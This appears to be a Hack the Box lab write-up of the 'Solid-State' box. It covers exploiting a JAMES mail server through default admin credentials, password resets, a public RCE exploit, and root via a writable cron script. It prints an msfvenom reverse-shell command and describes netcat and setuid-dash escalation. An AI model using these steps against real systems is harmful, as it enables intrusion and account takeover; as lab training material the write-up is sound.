Solid-State — Hack the Box

This is the first box I am doing after a long pause in my OSCP journey because of Covid-19 and other delays. So, Let’s dive in…………..!

Ran nmap on the host, it gave output as below:

Looks like there is a web server being run. But there was nothing much just a normal website.

So let’s move to other ports. I searched for JAMES Remote Admin and saw there is a remote code execution.

There is exploit code present in the exploit db : https://www.exploit-db.com/exploits/35513

But before that we will try telnet to port 4555.

default username and password works here and enter HELP here to see what commands can be done here.

I typed listusers after that I tried to change the password setpassword. One can change the password for all the list of the users.

In the previous image I have changed password for mindy.

Now try telnet to port 110 and it is a pop server so we can try the password set in the above, and then list the mails by using LIST command.

Now use TOP to read the message and ssh to the server.

Try ssh to the server.

Mindy can log in but as we see in the above screenshot the shell provided is restricted shell.

So this is a dead point, so I thought of trying the exploit which we found before.

We can see payload, change this to a python unix reverse meterpreter shell.

I tried something listed in: https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

Python Reverse Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py

Change the payload as below in the exploit script.

Run the python exploit. It can be seen in the below screenshot that payload will be executed when someone logs in.

Observe as mindy logs in and netcat listening in kali get the reverse shell.

As we got the shell and the flag we try to privilege escalation by running linuxenum.sh which can be downloaded from below:

rebootuser/LinEnum

Download it into kali and by using python simplehttpserver and open a server.

As can be seen we can use curl to download the linuxenum.sh file.

run LinEnum.sh -t shows tmp.py writeable file and can be run as privileges of root.

try editing the tmp.py in kali and try changing there and then download it to victim because both vi and nano are cranky.

try again the same reverse shell but on different port.

In tmp.py write that payload.

and listens the port for which we created the payload.

As we can see in the above screenshot we got root privileges.

We will try a different payload in the tmp.py with nc executing /bin/bash

try nc in os.system.

follow the same curl and cron will run. yaay we got root shell in another way.

let’s try one more way by changing the dash shell to setuid run under root permissions as below in the same tmp.py file as below:

Observe in the below screenshot dash becomes setuid is enabled for running as root

Now try opening dash shell in mindy shell.

Observe in the above screenshot when dash is opened, real uid is same but effective uid is 0 which is of root and mindy can cd to root and can read the flag.

Phewwww, a lot of learning. That’s all for now :)